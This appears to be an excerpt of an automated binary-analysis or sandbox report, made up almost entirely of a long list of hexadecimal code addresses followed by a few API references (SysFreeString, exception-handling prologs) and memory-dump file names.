                                                                      0x0043207b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432081
                                                                      0x00432025
                                                                      0x0043202a
                                                                      0x0043202e
                                                                      0x00432032
                                                                      0x00432048
                                                                      0x00432054
                                                                      0x00432059
                                                                      0x0043205b
                                                                      0x00432089
                                                                      0x0043208d
                                                                      0x00000000
                                                                      0x00432092
                                                                      0x0043205d
                                                                      0x00432063
                                                                      0x00432067
                                                                      0x00000000
                                                                      0x0043206c
                                                                      0x00432041
                                                                      0x00000000
                                                                      0x00432041
                                                                      0x0043200d
                                                                      0x00432013
                                                                      0x00432016
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432016
                                                                      0x00431fc7
                                                                      0x00431fca
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431fca
                                                                      0x00432093
                                                                      0x00432097
                                                                      0x004320a0
                                                                      0x004320a0
                                                                      0x004320a2
                                                                      0x004320a8
                                                                      0x004320ab
                                                                      0x004320ad
                                                                      0x004320b1
                                                                      0x004320bc
                                                                      0x004320bc
                                                                      0x004320b3
                                                                      0x004320b5
                                                                      0x004320b5
                                                                      0x004320be
                                                                      0x004320c0
                                                                      0x004320c3
                                                                      0x004320c7
                                                                      0x004320ca
                                                                      0x004320cf
                                                                      0x004320cf
                                                                      0x004320db
                                                                      0x004320de
                                                                      0x004320ee
                                                                      0x004320f9
                                                                      0x00432101
                                                                      0x00432102
                                                                      0x0043210b
                                                                      0x00432111
                                                                      0x00432118
                                                                      0x0043211f
                                                                      0x00432123
                                                                      0x00432124
                                                                      0x00432126
                                                                      0x00432129
                                                                      0x0043212e
                                                                      0x00432130
                                                                      0x00432133
                                                                      0x00432679
                                                                      0x0043267d
                                                                      0x00432682
                                                                      0x00432685
                                                                      0x00432689
                                                                      0x0043268b
                                                                      0x00432690
                                                                      0x00432690
                                                                      0x00432699
                                                                      0x0043269f
                                                                      0x004326a9
                                                                      0x004326b4
                                                                      0x004326b8
                                                                      0x004326c3
                                                                      0x004326c7
                                                                      0x004326d2
                                                                      0x004326d6
                                                                      0x004326db
                                                                      0x004326e5
                                                                      0x004326e9
                                                                      0x004326f1
                                                                      0x004326f5
                                                                      0x00432700
                                                                      0x00432704
                                                                      0x00432709
                                                                      0x0043270b
                                                                      0x0043270f
                                                                      0x00432714
                                                                      0x00432714
                                                                      0x00432717
                                                                      0x00432721
                                                                      0x00432726
                                                                      0x00432730
                                                                      0x00432735
                                                                      0x00432139
                                                                      0x00432139
                                                                      0x0043213c
                                                                      0x0043213c
                                                                      0x0043213f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432144
                                                                      0x0043214b
                                                                      0x0043214e
                                                                      0x00432151
                                                                      0x00432151
                                                                      0x0043215f
                                                                      0x00432168
                                                                      0x00432169
                                                                      0x0043216c
                                                                      0x0043216f
                                                                      0x00432172
                                                                      0x00432177
                                                                      0x00432179
                                                                      0x0043217c
                                                                      0x0043217f
                                                                      0x00432289
                                                                      0x0043228f
                                                                      0x00432292
                                                                      0x004322a0
                                                                      0x004322a3
                                                                      0x004322a7
                                                                      0x004322aa
                                                                      0x004322af
                                                                      0x004322b2
                                                                      0x004322b6
                                                                      0x004322b8
                                                                      0x004322bd
                                                                      0x004322bd
                                                                      0x004322c6
                                                                      0x004322ca
                                                                      0x004322cf
                                                                      0x004322d3
                                                                      0x00431f75
                                                                      0x00431f82
                                                                      0x00431f88
                                                                      0x00431f8e
                                                                      0x00431f94
                                                                      0x00431f9a
                                                                      0x00431fa0
                                                                      0x00431fa5
                                                                      0x00431fa9
                                                                      0x00431fac
                                                                      0x00431fb0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004322d3
                                                                      0x00432188
                                                                      0x00432188
                                                                      0x0043218b
                                                                      0x0043218e
                                                                      0x004321a9
                                                                      0x004321ac
                                                                      0x004321b1
                                                                      0x004321b4
                                                                      0x004321b8
                                                                      0x004321c2
                                                                      0x004321c3
                                                                      0x004321dd
                                                                      0x004321e1
                                                                      0x004321e3
                                                                      0x004321c5
                                                                      0x004321c8
                                                                      0x004321ce
                                                                      0x004321ce
                                                                      0x004321e8
                                                                      0x004321ef
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004321f5
                                                                      0x004321fc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432202
                                                                      0x00432205
                                                                      0x00432208
                                                                      0x0043220c
                                                                      0x00432214
                                                                      0x0043221a
                                                                      0x0043221d
                                                                      0x00432220
                                                                      0x00432226
                                                                      0x0043222a
                                                                      0x0043222c
                                                                      0x00432232
                                                                      0x00432247
                                                                      0x0043224e
                                                                      0x0043224e
                                                                      0x0043224e
                                                                      0x00432234
                                                                      0x00432234
                                                                      0x00432237
                                                                      0x0043223e
                                                                      0x0043223e
                                                                      0x0043225e
                                                                      0x00432265
                                                                      0x00432266
                                                                      0x00432266
                                                                      0x00432271
                                                                      0x00432275
                                                                      0x0043227a
                                                                      0x0043227e
                                                                      0x0043227f
                                                                      0x00432283
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432283
                                                                      0x00432743
                                                                      0x00432749
                                                                      0x00432753
                                                                      0x00432758
                                                                      0x0043275b
                                                                      0x0043275f
                                                                      0x00432761
                                                                      0x00432766
                                                                      0x00432766
                                                                      0x0043276f
                                                                      0x00432775
                                                                      0x0043277f
                                                                      0x0043278a
                                                                      0x0043278e
                                                                      0x00432799
                                                                      0x0043279d
                                                                      0x004327a8
                                                                      0x004327ac
                                                                      0x004327b1
                                                                      0x004327bb
                                                                      0x004327bf
                                                                      0x004327c7
                                                                      0x004327cb
                                                                      0x004327d6
                                                                      0x004327da
                                                                      0x004327df
                                                                      0x004327e1
                                                                      0x004327e5
                                                                      0x004327ea
                                                                      0x004327ea
                                                                      0x004327ed
                                                                      0x004327f7
                                                                      0x004327fc
                                                                      0x00432806
                                                                      0x0043280b
                                                                      0x0043280b
                                                                      0x00000000
                                                                      0x00432133
                                                                      0x00432099
                                                                      0x00432099
                                                                      0x00000000
                                                                      0x00432099
                                                                      0x00431f78
                                                                      0x00431f3f
                                                                      0x00431f3f
                                                                      0x00431f3f
                                                                      0x00431f43
                                                                      0x00431f46
                                                                      0x00431f59
                                                                      0x00431f5e
                                                                      0x00431f62
                                                                      0x00431f62
                                                                      0x00431f62
                                                                      0x00431f62
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431ead
                                                                      0x00431ead
                                                                      0x00431eb3
                                                                      0x00431ebc
                                                                      0x00431ec8
                                                                      0x00431ec9
                                                                      0x00431ed0
                                                                      0x00431ed5
                                                                      0x00431edc
                                                                      0x00431edf
                                                                      0x00431edf
                                                                      0x00431ee7
                                                                      0x00431eec
                                                                      0x00431ef2
                                                                      0x00431ef2
                                                                      0x00431ef7
                                                                      0x00431efa
                                                                      0x00000000
                                                                      0x00431efa
                                                                      0x00431e8f
                                                                      0x00431e93
                                                                      0x00431e9e
                                                                      0x00431e9e
                                                                      0x00431e9e
                                                                      0x00000000
                                                                      0x00431e9e
                                                                      0x00000000
                                                                      0x0043197f
                                                                      0x00431982
                                                                      0x00431985
                                                                      0x0043198d
                                                                      0x00431993
                                                                      0x00431995
                                                                      0x0043199b
                                                                      0x0043199e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004319a4
                                                                      0x004319a7
                                                                      0x004319aa
                                                                      0x004319b1
                                                                      0x004319b4
                                                                      0x004319b7
                                                                      0x00431a88
                                                                      0x00431a93
                                                                      0x00431a97
                                                                      0x00431a9c
                                                                      0x00431a9e
                                                                      0x00431aa1
                                                                      0x004323fd
                                                                      0x00432401
                                                                      0x0043240c
                                                                      0x00432410
                                                                      0x0043241b
                                                                      0x0043241f
                                                                      0x00432424
                                                                      0x0043242e
                                                                      0x00432432
                                                                      0x0043243a
                                                                      0x0043243e
                                                                      0x00432449
                                                                      0x0043244d
                                                                      0x00432452
                                                                      0x00432454
                                                                      0x00432458
                                                                      0x0043245d
                                                                      0x0043245d
                                                                      0x00432460
                                                                      0x00000000
                                                                      0x00432460
                                                                      0x00431aa7
                                                                      0x00431aaa
                                                                      0x00431ab6
                                                                      0x00431aba
                                                                      0x00431abb
                                                                      0x00431abf
                                                                      0x00431acc
                                                                      0x00431ad1
                                                                      0x00431ade
                                                                      0x00431ae2
                                                                      0x00431ae6
                                                                      0x00431aef
                                                                      0x00431af1
                                                                      0x00431af4
                                                                      0x00431af7
                                                                      0x00431b51
                                                                      0x00431b6b
                                                                      0x00431b70
                                                                      0x00431b72
                                                                      0x00431b75
                                                                      0x0043246e
                                                                      0x00432472
                                                                      0x00432477
                                                                      0x0043247a
                                                                      0x0043247e
                                                                      0x00432480
                                                                      0x00432485
                                                                      0x00432485
                                                                      0x00432488
                                                                      0x0043248b
                                                                      0x0043248f
                                                                      0x00432491
                                                                      0x00432496
                                                                      0x00432496
                                                                      0x0043249f
                                                                      0x004324a3
                                                                      0x004324ae
                                                                      0x004324b2
                                                                      0x004324bd
                                                                      0x004324c1
                                                                      0x004324c6
                                                                      0x004324d0
                                                                      0x004324d4
                                                                      0x004324dc
                                                                      0x004324e0
                                                                      0x004324eb
                                                                      0x004324ef
                                                                      0x004324f4
                                                                      0x004324f6
                                                                      0x004324fa
                                                                      0x004324ff
                                                                      0x004324ff
                                                                      0x00432502
                                                                      0x00000000
                                                                      0x00432502
                                                                      0x00431b7b
                                                                      0x00431b7e
                                                                      0x00431b80
                                                                      0x00431b85
                                                                      0x00431b88
                                                                      0x00431b88
                                                                      0x00431b88
                                                                      0x00431b88
                                                                      0x00431b98
                                                                      0x00431ba0
                                                                      0x00431ba9
                                                                      0x00431bb5
                                                                      0x00431bb7
                                                                      0x00431bba
                                                                      0x00431bbf
                                                                      0x00431bcc
                                                                      0x00431bd2
                                                                      0x00431bd8
                                                                      0x00431bec
                                                                      0x00431bf2
                                                                      0x00431c03
                                                                      0x00431c06
                                                                      0x00431c0e
                                                                      0x00431c0f
                                                                      0x00431c1b
                                                                      0x00431c1f
                                                                      0x00431c26
                                                                      0x00431c2a
                                                                      0x00431c2b
                                                                      0x00431c2d
                                                                      0x00431c30
                                                                      0x00431c35
                                                                      0x00431c37
                                                                      0x00431c3a
                                                                      0x00432510
                                                                      0x00432514
                                                                      0x0043251f
                                                                      0x00432523
                                                                      0x00432528
                                                                      0x0043252b
                                                                      0x0043252f
                                                                      0x00432531
                                                                      0x00432536
                                                                      0x00432536
                                                                      0x00432539
                                                                      0x0043253c
                                                                      0x00432540
                                                                      0x00432542
                                                                      0x00432547
                                                                      0x00432547
                                                                      0x00432550
                                                                      0x00432554
                                                                      0x0043255f
                                                                      0x00432563
                                                                      0x0043256e
                                                                      0x00432572
                                                                      0x00432577
                                                                      0x00432581
                                                                      0x00432585
                                                                      0x0043258d
                                                                      0x00432591
                                                                      0x0043259c
                                                                      0x004325a0
                                                                      0x004325a5
                                                                      0x004325a7
                                                                      0x004325ab
                                                                      0x004325b0
                                                                      0x004325b0
                                                                      0x004325b3
                                                                      0x00000000
                                                                      0x00431c40
                                                                      0x00431c46
                                                                      0x00431c4b
                                                                      0x00431c52
                                                                      0x004325bb
                                                                      0x004325c7
                                                                      0x004325cb
                                                                      0x004325d6
                                                                      0x004325da
                                                                      0x004325df
                                                                      0x004325e2
                                                                      0x004325e6
                                                                      0x004325e8
                                                                      0x004325ed
                                                                      0x004325ed
                                                                      0x004325f0
                                                                      0x004325f3
                                                                      0x004325f7
                                                                      0x004325f9
                                                                      0x004325fe
                                                                      0x004325fe
                                                                      0x00432607
                                                                      0x0043260b
                                                                      0x00432616
                                                                      0x0043261a
                                                                      0x00432625
                                                                      0x00432629
                                                                      0x0043262e
                                                                      0x00432638
                                                                      0x0043263c
                                                                      0x00432644
                                                                      0x00432648
                                                                      0x00000000
                                                                      0x00432648
                                                                      0x00431c58
                                                                      0x00431c5b
                                                                      0x00431c5e
                                                                      0x00431c61
                                                                      0x00431c7f
                                                                      0x00431c8a
                                                                      0x00431c93
                                                                      0x00431c94
                                                                      0x00431c97
                                                                      0x00431c9a
                                                                      0x00431c9d
                                                                      0x00431ca8
                                                                      0x00431cac
                                                                      0x00431cb7
                                                                      0x00431cbb
                                                                      0x00431cc0
                                                                      0x00431cc3
                                                                      0x00431cc7
                                                                      0x00431cc9
                                                                      0x00431cce
                                                                      0x00431cce
                                                                      0x00431cd1
                                                                      0x00431cd4
                                                                      0x00431cd8
                                                                      0x00431cda
                                                                      0x00431cdf
                                                                      0x00431cdf
                                                                      0x00431ce8
                                                                      0x00431cec
                                                                      0x00431cf1
                                                                      0x00431cfa
                                                                      0x00431cfd
                                                                      0x00431d0b
                                                                      0x00431d0f
                                                                      0x00431d12
                                                                      0x00431d15
                                                                      0x00431d17
                                                                      0x00431d1a
                                                                      0x00431e3b
                                                                      0x00431e3b
                                                                      0x00431e3e
                                                                      0x00431e45
                                                                      0x00431e4b
                                                                      0x0043198a
                                                                      0x00000000
                                                                      0x0043198a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431d20
                                                                      0x00431d20
                                                                      0x00431d26
                                                                      0x00431d3c
                                                                      0x00431d40
                                                                      0x00431d45
                                                                      0x00431d4c
                                                                      0x00431d58
                                                                      0x00431d5b
                                                                      0x00431d5e
                                                                      0x00431d60
                                                                      0x00431d6c
                                                                      0x00431d6f
                                                                      0x00431d72
                                                                      0x00431d76
                                                                      0x00431d7c
                                                                      0x00431d80
                                                                      0x00431d8c
                                                                      0x00431d9a
                                                                      0x00431d9b
                                                                      0x00431da1
                                                                      0x00431da5
                                                                      0x00431db6
                                                                      0x00431dc2
                                                                      0x00431dce
                                                                      0x00431dda
                                                                      0x00431de6
                                                                      0x00431df3
                                                                      0x00431df8
                                                                      0x00431e02
                                                                      0x00431e07
                                                                      0x00431e11
                                                                      0x00431e18
                                                                      0x00431e19
                                                                      0x00431e19
                                                                      0x00431d76
                                                                      0x00431d60
                                                                      0x00431e24
                                                                      0x00431e28
                                                                      0x00431e30
                                                                      0x00431e31
                                                                      0x00431e34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431c63
                                                                      0x00431c63
                                                                      0x00431c66
                                                                      0x00431c6d
                                                                      0x00431c70
                                                                      0x00431c73
                                                                      0x00431c76
                                                                      0x00431c77
                                                                      0x00431c77
                                                                      0x00431c7c
                                                                      0x00000000
                                                                      0x00431c7c
                                                                      0x00431c3a
                                                                      0x00431af9
                                                                      0x00431afc
                                                                      0x00431b04
                                                                      0x00431b07
                                                                      0x00431b0b
                                                                      0x00431b0e
                                                                      0x00431b12
                                                                      0x00431b1a
                                                                      0x00431b1d
                                                                      0x00431b20
                                                                      0x00431b22
                                                                      0x00431b2a
                                                                      0x00431b2d
                                                                      0x00431b31
                                                                      0x00431b33
                                                                      0x00431b33
                                                                      0x00431b31
                                                                      0x00431b22
                                                                      0x00431b40
                                                                      0x00431b48
                                                                      0x00431b4c
                                                                      0x00431b4f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431b01
                                                                      0x00431b01
                                                                      0x00000000
                                                                      0x00431b04
                                                                      0x004319c0
                                                                      0x004319c5
                                                                      0x004319cb
                                                                      0x004319d1
                                                                      0x004319d2
                                                                      0x004319d3
                                                                      0x004319da
                                                                      0x004319e0
                                                                      0x004319f6
                                                                      0x004319fc
                                                                      0x00431a00
                                                                      0x00431a01
                                                                      0x00431a04
                                                                      0x00431a09
                                                                      0x00431a0b
                                                                      0x00431a0e
                                                                      0x0043237d
                                                                      0x00432381
                                                                      0x0043238c
                                                                      0x00432390
                                                                      0x00432395
                                                                      0x0043239f
                                                                      0x004323a3
                                                                      0x004323ab
                                                                      0x004323af
                                                                      0x004323ba
                                                                      0x004323be
                                                                      0x004323c3
                                                                      0x004323c5
                                                                      0x004323c9
                                                                      0x004323ce
                                                                      0x004323ce
                                                                      0x004323d1
                                                                      0x004323db
                                                                      0x004323e0
                                                                      0x004323ea
                                                                      0x004323ef
                                                                      0x00000000
                                                                      0x004323ef
                                                                      0x00431a1a
                                                                      0x00431a23
                                                                      0x00431a2f
                                                                      0x00431a33
                                                                      0x00431a36
                                                                      0x00431a39
                                                                      0x00431a3c
                                                                      0x00431a40
                                                                      0x00431a6f
                                                                      0x00431a6f
                                                                      0x00431a72
                                                                      0x00431a75
                                                                      0x00431a78
                                                                      0x00000000
                                                                      0x00431a78
                                                                      0x00431a44
                                                                      0x00431a44
                                                                      0x00431a47
                                                                      0x00431a4a
                                                                      0x00431a58
                                                                      0x00431a5d
                                                                      0x00431a60
                                                                      0x00431a66
                                                                      0x00431a6a
                                                                      0x00431a6a
                                                                      0x00000000
                                                                      0x00431a4a
                                                                      0x00000000
                                                                      0x0043198d
                                                                      0x004322f7
                                                                      0x004322fd
                                                                      0x00432301
                                                                      0x0043230c
                                                                      0x00432310
                                                                      0x00432315
                                                                      0x00432318
                                                                      0x00432318
                                                                      0x00432325
                                                                      0x0043232b
                                                                      0x00432817
                                                                      0x0043281e
                                                                      0x00432824
                                                                      0x0043282a
                                                                      0x0043282d
                                                                      0x00432837
                                                                      0x0043283a
                                                                      0x0043283e
                                                                      0x00432841
                                                                      0x00432844
                                                                      0x00432898
                                                                      0x004328a4
                                                                      0x004328a9
                                                                      0x004328ad
                                                                      0x004328b4
                                                                      0x0043293f
                                                                      0x00432945
                                                                      0x00432949
                                                                      0x00432951
                                                                      0x00432956
                                                                      0x00432960
                                                                      0x00432964
                                                                      0x0043296c
                                                                      0x00432970
                                                                      0x0043297b
                                                                      0x0043297f
                                                                      0x00432984
                                                                      0x00432986
                                                                      0x0043298a
                                                                      0x0043298f
                                                                      0x0043298f
                                                                      0x00432992
                                                                      0x00432992
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004328ba
                                                                      0x004328ba
                                                                      0x004328c9
                                                                      0x004328d2
                                                                      0x004328d7
                                                                      0x004328e1
                                                                      0x004328e5
                                                                      0x004328e6
                                                                      0x004328ff
                                                                      0x00432900
                                                                      0x00432902
                                                                      0x004328e8
                                                                      0x004328f0
                                                                      0x004328f0
                                                                      0x00432910
                                                                      0x00432917
                                                                      0x00432918
                                                                      0x0043291d
                                                                      0x00432927
                                                                      0x0043292c
                                                                      0x00432933
                                                                      0x00432933
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00432846
                                                                      0x00432846
                                                                      0x0043284c
                                                                      0x0043284f
                                                                      0x00432853
                                                                      0x0043286c
                                                                      0x0043286e
                                                                      0x00432871
                                                                      0x0043287f
                                                                      0x00432888
                                                                      0x00000000
                                                                      0x00432888
                                                                      0x00432879
                                                                      0x0043287d
                                                                      0x0043287d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043287d
                                                                      0x00432855
                                                                      0x00432859
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043285b
                                                                      0x0043285f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043288d
                                                                      0x0043288d
                                                                      0x00432893
                                                                      0x00432893
                                                                      0x00000000
                                                                      0x00432846
                                                                      0x00432331
                                                                      0x0043233b
                                                                      0x0043233f
                                                                      0x00432347
                                                                      0x0043234b
                                                                      0x00432356
                                                                      0x0043235a
                                                                      0x0043235f
                                                                      0x00432361
                                                                      0x00432365
                                                                      0x0043236a
                                                                      0x0043236a
                                                                      0x0043236d
                                                                      0x00000000
                                                                      0x0043236d
                                                                      0x00431870
                                                                      0x0043187a
                                                                      0x0043187e
                                                                      0x00431886
                                                                      0x0043188a
                                                                      0x00431895
                                                                      0x00431899
                                                                      0x0043189e
                                                                      0x004318a0
                                                                      0x004318a4
                                                                      0x004318a9
                                                                      0x004318a9
                                                                      0x004318ac
                                                                      0x00000000
                                                                      0x004318ac
                                                                      0x0043181d
                                                                      0x00431827
                                                                      0x0043182b
                                                                      0x00431833
                                                                      0x00431837
                                                                      0x00431842
                                                                      0x00431846
                                                                      0x0043184b
                                                                      0x0043184d
                                                                      0x00431851
                                                                      0x00431856
                                                                      0x00431856
                                                                      0x00431859
                                                                      0x00000000
                                                                      0x00431859
                                                                      0x004316dd
                                                                      0x004316e4
                                                                      0x004316e7
                                                                      0x004316ea
                                                                      0x004316ec
                                                                      0x004316f0
                                                                      0x0043170c
                                                                      0x0043170c
                                                                      0x004316f2
                                                                      0x004316f2
                                                                      0x004316f8
                                                                      0x004316fc
                                                                      0x004316ff
                                                                      0x00431704
                                                                      0x00431704
                                                                      0x00431715
                                                                      0x00431719
                                                                      0x0043171f
                                                                      0x00431727
                                                                      0x00431729
                                                                      0x0043172d
                                                                      0x00431740
                                                                      0x00431743
                                                                      0x00431745
                                                                      0x0043178d
                                                                      0x00431793
                                                                      0x00431798
                                                                      0x0043179c
                                                                      0x0043179f
                                                                      0x004317a1
                                                                      0x004317a4
                                                                      0x004317a7
                                                                      0x004317f3
                                                                      0x004317f6
                                                                      0x004317fb
                                                                      0x00431802
                                                                      0x00000000
                                                                      0x00431802
                                                                      0x004317a9
                                                                      0x004317af
                                                                      0x004317b9
                                                                      0x004317bd
                                                                      0x004317c5
                                                                      0x004317c9
                                                                      0x004317d4
                                                                      0x004317d8
                                                                      0x004317dd
                                                                      0x004317df
                                                                      0x004317e3
                                                                      0x004317e8
                                                                      0x004317e8
                                                                      0x004317eb
                                                                      0x00000000
                                                                      0x004317eb
                                                                      0x00431747
                                                                      0x00431751
                                                                      0x00431755
                                                                      0x0043175d
                                                                      0x00431761
                                                                      0x0043176c
                                                                      0x00431770
                                                                      0x00431775
                                                                      0x00431777
                                                                      0x0043177b
                                                                      0x00431780
                                                                      0x00431780
                                                                      0x00431783
                                                                      0x00000000
                                                                      0x0043172f
                                                                      0x00431732
                                                                      0x00431736
                                                                      0x00000000
                                                                      0x00431736
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043160a
                                                                      0x0043160a
                                                                      0x0043160d
                                                                      0x00431610
                                                                      0x00431613
                                                                      0x00431617
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043161d
                                                                      0x00431621
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431627
                                                                      0x0043162b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431634
                                                                      0x00431634
                                                                      0x00431637
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043163d
                                                                      0x00431641
                                                                      0x00431645
                                                                      0x0043169e
                                                                      0x0043169e
                                                                      0x004316b5
                                                                      0x004316ba
                                                                      0x00000000
                                                                      0x004316ba
                                                                      0x00431647
                                                                      0x0043164a
                                                                      0x0043164d
                                                                      0x0043164f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431651
                                                                      0x00431653
                                                                      0x00431657
                                                                      0x00431657
                                                                      0x0043165b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043165d
                                                                      0x0043165f
                                                                      0x0043166b
                                                                      0x0043166b
                                                                      0x0043166e
                                                                      0x0043166e
                                                                      0x00431670
                                                                      0x00431672
                                                                      0x0043167b
                                                                      0x00431682
                                                                      0x0043168b
                                                                      0x0043168e
                                                                      0x00431698
                                                                      0x0043169d
                                                                      0x00000000
                                                                      0x00431670
                                                                      0x00431662
                                                                      0x00431662
                                                                      0x00431667
                                                                      0x00000000
                                                                      0x004316bd
                                                                      0x004316bd
                                                                      0x004316c3
                                                                      0x004316c3
                                                                      0x00000000
                                                                      0x0043160a
                                                                      0x004315ef
                                                                      0x004315f3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431583
                                                                      0x0043158e
                                                                      0x00431590
                                                                      0x00431592
                                                                      0x0043264d
                                                                      0x00432653
                                                                      0x00432657
                                                                      0x0043265c
                                                                      0x0043265e
                                                                      0x00432662
                                                                      0x0043266b
                                                                      0x0043266b
                                                                      0x00000000
                                                                      0x00432662
                                                                      0x00000000
                                                                      0x00431592
                                                                      0x00431522
                                                                      0x00431522
                                                                      0x00432994
                                                                      0x00432994
                                                                      0x0043299e
                                                                      0x004329a3
                                                                      0x004329ad
                                                                      0x004329b2
                                                                      0x004329b4
                                                                      0x004329b9
                                                                      0x004329c2
                                                                      0x004329c2
                                                                      0x00431520
                                                                      0x00431493
                                                                      0x00431496
                                                                      0x00431496
                                                                      0x0043149c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043149e
                                                                      0x004314a1
                                                                      0x004314a4
                                                                      0x004314a7
                                                                      0x004314ae
                                                                      0x004314b6
                                                                      0x004314b9
                                                                      0x00000000
                                                                      0x004314be
                                                                      0x004314be
                                                                      0x004314c1
                                                                      0x004314d0
                                                                      0x004314d0
                                                                      0x00000000
                                                                      0x004314d0
                                                                      0x004314c3
                                                                      0x004314ca
                                                                      0x004314ca
                                                                      0x004314cd
                                                                      0x00000000
                                                                      0x004314cd
                                                                      0x004314c5
                                                                      0x004314c8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004314c8
                                                                      0x004314d2
                                                                      0x004314d2
                                                                      0x004314d5
                                                                      0x004314d8
                                                                      0x00000000
                                                                      0x00431496
                                                                      0x004312d1
                                                                      0x004312d6
                                                                      0x004312db
                                                                      0x004312f0
                                                                      0x004312f0
                                                                      0x004312f2
                                                                      0x004312f7
                                                                      0x00431315
                                                                      0x00431318
                                                                      0x0043131b
                                                                      0x0043146d
                                                                      0x00431479
                                                                      0x0043147e
                                                                      0x00431481
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00431321
                                                                      0x00431321
                                                                      0x00431327
                                                                      0x0043132c
                                                                      0x00431337
                                                                      0x0043133a
                                                                      0x0043133d
                                                                      0x00431340
                                                                      0x00431343
                                                                      0x00431346
                                                                      0x00431349
                                                                      0x0043134f
                                                                      0x00431355
                                                                      0x0043135b
                                                                      0x0043135d
                                                                      0x00431360
                                                                      0x00431394
                                                                      0x00431397
                                                                      0x0043139d
                                                                      0x00431362
                                                                      0x00431365
                                                                      0x00431365
                                                                      0x0043136c
                                                                      0x0043136e
                                                                      0x00431370
                                                                      0x00431375
                                                                      0x00431388
                                                                      0x0043138b
                                                                      0x00431391
                                                                      0x00431391
                                                                      0x00431375
                                                                      0x00000000
                                                                      0x0043136c
                                                                      0x004313a3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004313ac
                                                                      0x004313b5
                                                                      0x004313bb
                                                                      0x004313c1
                                                                      0x004313c4
                                                                      0x004313e4
                                                                      0x004313e4
                                                                      0x00000000
                                                                      0x004313c6
                                                                      0x004313c9
                                                                      0x004313cc
                                                                      0x004313cc
                                                                      0x004313d4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004313dc
                                                                      0x004313dd
                                                                      0x004313e2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004313e2
                                                                      0x00431430
                                                                      0x004313e8
                                                                      0x004313f2
                                                                      0x004313f5
                                                                      0x004313fa
                                                                      0x00431405
                                                                      0x00431408
                                                                      0x00431409
                                                                      0x00431410
                                                                      0x00431411
                                                                      0x0043141c
                                                                      0x00431436
                                                                      0x00431439
                                                                      0x0043143c
                                                                      0x0043143f
                                                                      0x00431442
                                                                      0x00431445
                                                                      0x00431454
                                                                      0x00431454
                                                                      0x00431458
                                                                      0x0043145a
                                                                      0x0043145a
                                                                      0x00000000
                                                                      0x00431458
                                                                      0x00431447
                                                                      0x0043144e
                                                                      0x0043144e
                                                                      0x00431451
                                                                      0x00000000
                                                                      0x00431451
                                                                      0x00431449
                                                                      0x0043144c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0043144c
                                                                      0x00431428
                                                                      0x0043142b
                                                                      0x00000000
                                                                      0x0043142b
                                                                      0x004313c4
                                                                      0x0043145e
                                                                      0x0043145e
                                                                      0x00431464
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004312f9
                                                                      0x004312f9
                                                                      0x004312ff
                                                                      0x00431304
                                                                      0x0043130c
                                                                      0x0043130c
                                                                      0x0043130f
                                                                      0x00431310
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004312dd
                                                                      0x004312dd
                                                                      0x004312e5
                                                                      0x004312ea
                                                                      0x004312eb
                                                                      0x00000000
                                                                      0x004312dd

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00431203
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 00431802
                                                                        • Part of subcall function 0040F5DB: __EH_prolog.LIBCMT ref: 0040F5E0
                                                                        • Part of subcall function 0042B864: __EH_prolog.LIBCMT ref: 0042B869
                                                                        • Part of subcall function 00428A47: __EH_prolog.LIBCMT ref: 00428A4C
                                                                        • Part of subcall function 00428510: __EH_prolog.LIBCMT ref: 00428515
                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004317A9
                                                                        • Part of subcall function 0043353F: __EH_prolog.LIBCMT ref: 00433544
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
